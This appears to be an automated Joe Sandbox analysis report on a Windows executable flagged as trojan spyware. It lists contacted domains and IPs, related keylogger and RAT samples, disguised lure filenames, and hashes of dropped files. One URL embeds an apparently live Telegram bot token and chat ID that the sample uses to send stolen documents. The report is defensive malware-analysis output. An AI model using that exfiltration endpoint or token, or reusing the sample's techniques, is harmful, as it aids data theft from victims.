https://drive.google.com/ | 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189ec | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram | 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065 | 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/~ | 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002B17000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | 4NG0guPiKA.exe | false | | high
http://api.telegram.org | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndn | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
142.250.181.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.186.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588607
Start date and time: 2025-01-11 03:03:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4NG0guPiKA.exe
renamed because original name is a hash value
Original Sample Name: ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/8@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 151
• Number of non-executed functions: 115
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.12.23.50
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
21:05:34 | API Interceptor | 569350x Sleep call for process: 4NG0guPiKA.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | uVpytXGpQz.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | H75MnQEha8.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | UF7jzc7ETP.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | FylY1FW6fl.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | v4nrZtP7K2.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
149.154.167.220 | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | TjoY7n65om.exe | malicious | Snake Keylogger |
149.154.167.220 | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT |
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: reallyfreegeoip.org
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
  uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.64.1
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
  VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.48.1
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1

Match: api.telegram.org
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
  Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220

Match: checkip.dyndns.com
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 193.122.130.0
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
  uVpytXGpQz.exe | malicious | Snake Keylogger | 132.226.8.169
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
  VCU262Y2QB.exe | malicious | Snake Keylogger | 193.122.130.0
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.130.0
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: TELEGRAMRU
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
  Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220

Match: CLOUDFLARENETUS
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1
  AxKxwW9WGa.exe | malicious | FormBook | 172.67.186.192
  k9OEsV37GE.exe | malicious | FormBook | 104.21.96.1
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
  XeFYBYYj0w.exe | malicious | FormBook | 188.114.96.3
  tfWjjV1LdT.exe | malicious | FormBook | 104.21.36.62
  uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.64.1

Match: UTMEMUS
  uVpytXGpQz.exe | malicious | Snake Keylogger | 132.226.8.169
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
  TjoY7n65om.exe | malicious | Snake Keylogger | 132.226.247.73
  Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  H75MnQEha8.exe | malicious | MassLogger RAT | 132.226.8.169
  z87sammylastborn.exe | malicious | MassLogger RAT | 132.226.247.73
  Ddj3E3qerh.exe | malicious | Snake Keylogger | 132.226.247.73
  6cicUo3f8g.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
  rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.80.1
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.80.1
  uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.80.1
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
  VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.80.1
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.80.1

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
  KtPCqWWnqM.exe | malicious | Unknown | 149.154.167.220
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  KtPCqWWnqM.exe | malicious | Unknown | 149.154.167.220
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  ukBQ4ch2nE.exe | malicious | AgentTesla | 149.154.167.220
  JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220

Match: 37f463bf4616ecd445d4a1937da06e19
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.181.238, 142.250.186.33
  YrCSUX2O3I.exe | malicious | GuLoader | 142.250.181.238, 142.250.186.33
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.238, 142.250.186.33
  4AMVusDMPP.exe | malicious | GuLoader | 142.250.181.238, 142.250.186.33
  Cpfkf79Rzk.exe | malicious | GuLoader | 142.250.181.238, 142.250.186.33
  TjoY7n65om.exe | malicious | Snake Keylogger | 142.250.181.238, 142.250.186.33
  Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.181.238, 142.250.186.33
  WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.238, 142.250.186.33
  TVPfW4WUdj.exe | malicious | GuLoader | 142.250.181.238, 142.250.186.33
  WGi85dsMNp.exe | malicious | GuLoader | 142.250.181.238, 142.250.186.33
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll
  Request for Quotation New collaboration.exe | malicious | GuLoader, MassLogger RAT
  Bank Swift and SOA PRN0072003410853_pdf.exe | malicious | GuLoader, MassLogger RAT
  Request for Quote and Collaboration Docs.exe | malicious | GuLoader, Snake Keylogger
  Request for Quote and Collaboration Docs.exe | malicious | GuLoader, Snake Keylogger
  REQUEST FOR QUOATION AND PRICES.exe | malicious | GuLoader, MassLogger RAT
  IBAN payment confirmation.exe | malicious | GuLoader, MassLogger RAT
  Bank Swift and SOA PRN0072003410853_pdf.exe | malicious | GuLoader, MassLogger RAT
  WC10SCPMaX.exe | malicious | Azorult, GuLoader
  PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger
  CL714440147.exe | malicious | GuLoader
Process: C:\Users\user\Desktop\4NG0guPiKA.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.801108840712148
Encrypted: false
SSDEEP: 192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
MD5: FC90DFB694D0E17B013D6F818BCE41B0
SHA1: 3243969886D640AF3BFA442728B9F0DFF9D5F5B0
SHA-256: 7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
SHA-512: 324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Request for Quotation New collaboration.exe, Detection: malicious
• Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious
• Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious
• Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious
• Filename: REQUEST FOR QUOATION AND PRICES.exe, Detection: malicious
• Filename: IBAN payment confirmation.exe, Detection: malicious
• Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious
• Filename: WC10SCPMaX.exe, Detection: malicious
• Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious
• Filename: CL714440147.exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1315865
                                                                                                          Entropy (8bit):3.5949686472855396
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:j8rRd69L0r8yMuaf+MP9jeCmo5gw7mS2J8OD0ZCPHb5g5YTmVBbTvR4/uWv871W8:Yf6Pgg1U0CT5Tm3vvDypK
                                                                                                          MD5:5A6642E8988A81F18B4290B6822BB259
                                                                                                          SHA1:42D4DF7B97EED5A2840A7E678708CA32EB535E41
                                                                                                          SHA-256:8FA1E9AE96D55A6AE8F0D7AD408782A09B14CD83AF3E43CCAFC0675307D4C445
                                                                                                          SHA-512:71E804077ACB1B60BE07996337400F4B07A37A02CDD39A48E06229D8AF156628AFB9229B43EB4882E26CE274F4550482AB4F7DAF07476E37C3E5385009FE3D54
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.:......,.......,.......\........$......r9......p:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):161977
                                                                                                          Entropy (8bit):1.2465706431701635
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                                          MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                                          SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                                          SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                                          SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):288630
                                                                                                          Entropy (8bit):7.7491676192107075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:juzLxL0r8yMuaf+MP9jeCmo5gj0D/A/DlsX5YJVCOD0ZCPzzb5wp03sB5aT1pTmP:S9L0r8yMuaf+MP9jeCmo5gw7mS2J8ODW
                                                                                                          MD5:03D02A84B85376B663A29D160AD89822
                                                                                                          SHA1:BED64291853193091B6867F3D890D1F64F210637
                                                                                                          SHA-256:72EC51CE52A19D8DCBA9176D1C3C40E15FE5637AD5721DB27DC4AD0314EB4CF9
                                                                                                          SHA-512:3C7F4EF9C1CFA9B004CA0F4CA6FBD3947C77CD9D1CAF9C18D863FA7C038E4EBB84B8025D4083C0F4F4EAF74684481EEF47CE04FBCDEC175A526D3D0249144E53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........._.....@.............7....[[.......................................t....NNN....''.....GG........................rr..yyy.........O..i......I......zz.z.........xxxx.}}.......................555......E.....yyyyy.+.....{{{........u...r..........q...........R.......".{...............yy........."".1..........u..9999..............T.S......?.......................~~~....<.......33.\.....................................Z......>.....5......................j....p.........777.........g.;..bbb.........|.........y......ssssss.LL........................*..........J......................:....x......qqq.........&...................c.'..........-.................#.....]...iii..........J.s.V...j....YY.......................gg.......|||........oo....(....))..................mmm...c....777...................i.......Y.))........K....!......****...$..............qq..........LL.$...m.........I.VVVV...........................%%%......................))......................__.........................
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):149030
                                                                                                          Entropy (8bit):4.598765709098575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:qAtbIHGVtkzD0DCax4/D7tw1DGdZuFPx/8xFGHM1iaLu/xuuPqhYiieeAK2:qARIHG7s0DD4/lwUcFeGHME5FqCiifAD
                                                                                                          MD5:CC1D8E3E4DC2D1AE30EA61C63E82FFE0
                                                                                                          SHA1:CB85577C8192221AB0B1A85B22786791C7430862
                                                                                                          SHA-256:5244EFBEF13598381119C2942340E9F3CC5AAF2B4D636ED0C32CB4CE5936A3F4
                                                                                                          SHA-512:AAF38BD184E0BC7B4101387E82F31C457481BE5584E94AA004C6E40CE91C919A8D4B1FB795AC3C37963751A093BD6FE840929215046D06F0C0693CAA98D08314
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....(............................L.........2222..........,....(...ww..............:............**....=...................fff........?...22...Q..........\........hh..,.0.aa.G.......o.............WW............]]..............A...uu.YYY............II.....g...7777...oooo........b.c.....TT.........BBB....................{{{{........]........................P.....................O...Q........+..RRR.........................6.................g.<.......W.E............................||.........................=.vv.ttt........kkk...........4.&&&...A.......s..../......<<.).......KK.ii.ii.o........44......%......!!!!...............R............... .....................3...I......yyy.......u.;;;........0......................YYY..))...............................-...............55.....................Z...WW................GGGGGGG..........m.........S........dd.....i...............................iii........................@@.......(((...(..........u...........A...............w.....))..e..r.......
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2929
                                                                                                          Entropy (8bit):7.418910042244289
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                                          MD5:49DAF4E74443D8502F3229468615185F
                                                                                                          SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                                          SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                                          SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):461378
                                                                                                          Entropy (8bit):1.252059381950645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                                          MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                                          SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                                          SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                                          SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                                          Malicious:false
                                                                                                          Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):225641
                                                                                                          Entropy (8bit):1.2362366155163755
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                                          MD5:94C4B93474D07658FCBD411A20E68532
                                                                                                          SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                                          SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                                          SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                                          Malicious:false
                                                                                                          Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......
